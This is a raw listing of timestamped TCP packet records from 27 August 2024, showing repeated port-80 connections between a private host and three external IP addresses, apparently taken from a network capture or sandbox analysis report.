Aug 27, 2024 14:20:04.262486935 CEST	80	52293	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:04.262727976 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.381546974 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.385759115 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.388315916 CEST	80	52293	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:04.388375044 CEST	52293	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.391330957 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:04.391398907 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.405602932 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:04.411056042 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.101758003 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.101830959 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.102478981 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.107357025 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.281707048 CEST	80	52294	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:05.281776905 CEST	52294	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:05.281867981 CEST	52294	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:05.282921076 CEST	52297	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:05.286600113 CEST	80	52294	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:05.287697077 CEST	80	52297	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:05.287763119 CEST	52297	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:05.287870884 CEST	52297	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:05.292612076 CEST	80	52297	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:05.340173960 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.340281010 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.451826096 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.452164888 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.457165003 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.457202911 CEST	80	52296	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:05.457237959 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.457274914 CEST	52296	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.457453966 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:05.462318897 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.152915955 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.153040886 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.154002905 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.158752918 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.394316912 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.394376993 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.501225948 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.501612902 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.506318092 CEST	80	52298	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.506397963 CEST	52298	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.506424904 CEST	80	52299	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.506494045 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.506691933 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:06.511507988 CEST	80	52299	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:06.875348091 CEST	80	52297	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:06.875431061 CEST	52297	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:06.879949093 CEST	52297	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:06.884978056 CEST	80	52297	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:07.024468899 CEST	52300	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:07.031294107 CEST	80	52300	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:07.031392097 CEST	52300	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:07.041486025 CEST	52300	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:07.046704054 CEST	80	52300	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:07.210591078 CEST	80	52299	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:07.210645914 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:07.437971115 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:07.638492107 CEST	52300	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:07.638803959 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:07.638834953 CEST	52295	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:07.643511057 CEST	52301	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:07.654774904 CEST	52302	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:07.748986006 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:08.632966995 CEST	80	52299	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:08.632996082 CEST	80	52301	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:08.633006096 CEST	80	52302	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:08.633016109 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:08.633064032 CEST	52299	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:08.633135080 CEST	52301	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:08.633157969 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:08.633160114 CEST	52302	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:08.634192944 CEST	52301	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:08.634469032 CEST	52302	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:08.634571075 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:08.877836943 CEST	80	52301	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:08.877886057 CEST	80	52302	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:08.877897978 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.559272051 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.559475899 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.560367107 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.565145016 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.805321932 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.805412054 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.927134037 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.927706957 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.932569027 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.932645082 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.932688951 CEST	80	52303	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:09.932734966 CEST	52303	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.942229033 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:09.947077990 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.469330072 CEST	80	52301	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:10.469408035 CEST	52301	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:10.475356102 CEST	52301	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:10.480194092 CEST	80	52301	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:10.577142000 CEST	52306	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:10.582026958 CEST	80	52306	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:10.582119942 CEST	52306	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:10.582226992 CEST	52306	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:10.587059975 CEST	80	52306	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:10.610097885 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.610277891 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.610773087 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.615498066 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.847827911 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.847891092 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.951805115 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.952023983 CEST	52307	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.957365036 CEST	80	52305	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.957380056 CEST	80	52307	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:10.957434893 CEST	52305	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.957465887 CEST	52307	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.957649946 CEST	52307	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:10.962455988 CEST	80	52307	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:11.638827085 CEST	52302	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:11.638854027 CEST	52306	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:11.638925076 CEST	52307	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:11.639764071 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:11.639797926 CEST	52309	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:11.644984961 CEST	80	52308	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:11.644999027 CEST	80	52309	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:11.645092010 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:11.645093918 CEST	52309	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:11.645230055 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:11.645231962 CEST	52309	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:11.650043964 CEST	80	52308	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:11.650118113 CEST	80	52309	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:11.748959064 CEST	52310	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:11.753923893 CEST	80	52310	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:11.754174948 CEST	52310	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:11.754175901 CEST	52310	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:11.758996964 CEST	80	52310	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:12.345043898 CEST	80	52308	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:12.345108032 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.453649044 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.453939915 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.458853006 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:12.458936930 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.458969116 CEST	80	52308	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:12.459012985 CEST	52308	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.459136009 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:12.466648102 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.155352116 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.155420065 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.156236887 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.161007881 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.266642094 CEST	80	52309	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:13.266721010 CEST	52309	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:13.269879103 CEST	52309	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:13.274926901 CEST	80	52309	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:13.375838995 CEST	52313	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:13.380817890 CEST	80	52313	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:13.380911112 CEST	52313	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:13.381045103 CEST	52313	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:13.385821104 CEST	80	52313	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:13.396797895 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.396842957 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.498604059 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.498996019 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.503827095 CEST	80	52311	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.503882885 CEST	52311	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.503946066 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:13.504025936 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.504163980 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:13.508955956 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.354795933 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.354929924 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.355638981 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.360513926 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.634638071 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.634756088 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.748912096 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.749289036 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.754118919 CEST	80	52314	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.754134893 CEST	80	52315	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.754213095 CEST	52314	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.754229069 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.754383087 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:14.759099960 CEST	80	52315	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:14.986049891 CEST	80	52313	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:14.986176968 CEST	52313	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:14.986238003 CEST	52313	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:14.987066984 CEST	52316	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:14.991039038 CEST	80	52313	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:14.991966009 CEST	80	52316	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:14.992052078 CEST	52316	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:14.992137909 CEST	52316	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:14.996992111 CEST	80	52316	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:15.524769068 CEST	80	52315	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:15.524913073 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.525609970 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.530476093 CEST	80	52315	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:15.663438082 CEST	52310	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:15.663490057 CEST	52316	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:15.663520098 CEST	52315	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.689081907 CEST	52317	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:15.694185019 CEST	80	52317	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:15.694272041 CEST	52317	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:15.696160078 CEST	52317	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:15.700937033 CEST	80	52317	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:15.953274012 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.953511953 CEST	52319	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:15.959232092 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:15.959247112 CEST	80	52319	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:15.959292889 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.959321022 CEST	52319	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:15.959903955 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:15.960056067 CEST	52319	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:15.964684963 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:15.964850903 CEST	80	52319	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:16.779968977 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:16.780030012 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:16.780790091 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:16.785584927 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:17.107415915 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:17.107525110 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.219116926 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.219403028 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.224216938 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:17.224265099 CEST	80	52318	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:17.224291086 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.224324942 CEST	52318	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.224436045 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:17.229270935 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:17.546693087 CEST	80	52319	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:17.546766996 CEST	52319	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:17.546844959 CEST	52319	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:17.549031019 CEST	52321	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:17.553230047 CEST	80	52319	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:17.555566072 CEST	80	52321	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:17.555649042 CEST	52321	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:17.555797100 CEST	52321	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:17.562187910 CEST	80	52321	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:18.113651037 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:18.113719940 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.114449978 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.119201899 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:18.353943110 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:18.354021072 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.467307091 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.467595100 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.472939968 CEST	80	52320	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:18.473001957 CEST	52320	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.473408937 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:18.473483086 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.473582983 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:18.480062962 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.161710024 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.161788940 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.162621021 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.167385101 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.173801899 CEST	80	52321	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.173871994 CEST	52321	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.173930883 CEST	52321	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.178745031 CEST	80	52321	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.280020952 CEST	52323	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.284883976 CEST	80	52323	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.284979105 CEST	52323	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.285074949 CEST	52323	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.289910078 CEST	80	52323	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.450040102 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.450217962 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.561156988 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.561480045 CEST	52324	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.566292048 CEST	80	52324	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.566401958 CEST	52324	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.566530943 CEST	80	52322	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.566577911 CEST	52324	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.566587925 CEST	52322	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.571410894 CEST	80	52324	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.685889006 CEST	52317	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:19.685964108 CEST	52323	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.685969114 CEST	52324	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.686753988 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.687390089 CEST	52326	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.691867113 CEST	80	52325	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.691971064 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.692612886 CEST	80	52326	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.692673922 CEST	52326	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.735842943 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:19.735961914 CEST	52326	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:19.740657091 CEST	80	52325	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:19.740761042 CEST	80	52326	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:19.797697067 CEST	52327	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:19.802568913 CEST	80	52327	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:19.802675009 CEST	52327	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:19.802854061 CEST	52327	80	192.168.2.6	89.23.103.42
Aug 27, 2024 14:20:19.807635069 CEST	80	52327	89.23.103.42	192.168.2.6
Aug 27, 2024 14:20:20.434163094 CEST	80	52325	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:20.434259892 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.545691967 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.546119928 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.550884008 CEST	80	52325	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:20.550964117 CEST	52325	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.551071882 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:20.551142931 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.551295996 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:20.556112051 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.294600964 CEST	80	52326	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:21.294670105 CEST	52326	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:21.294878960 CEST	52326	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:21.299592972 CEST	80	52326	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:21.332149029 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.332214117 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.334660053 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.339423895 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.406629086 CEST	52329	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:21.850442886 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.850543976 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.851082087 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.851134062 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.852389097 CEST	80	52329	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:21.852473974 CEST	52329	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:21.852638006 CEST	52329	80	192.168.2.6	185.209.162.226
Aug 27, 2024 14:20:21.857561111 CEST	80	52329	185.209.162.226	192.168.2.6
Aug 27, 2024 14:20:21.951894045 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.952209949 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.957103014 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.957117081 CEST	80	52328	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:21.957181931 CEST	52328	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.957196951 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.957386971 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:21.962152958 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:22.654274940 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:22.654367924 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:22.655078888 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:22.659836054 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:22.975404978 CEST	80	52330	185.208.158.116	192.168.2.6
Aug 27, 2024 14:20:22.975531101 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.076812983 CEST	52330	80	192.168.2.6	185.208.158.116
Aug 27, 2024 14:20:23.077142000 CEST	52331	80	192.168.2.6	185.208.158.116
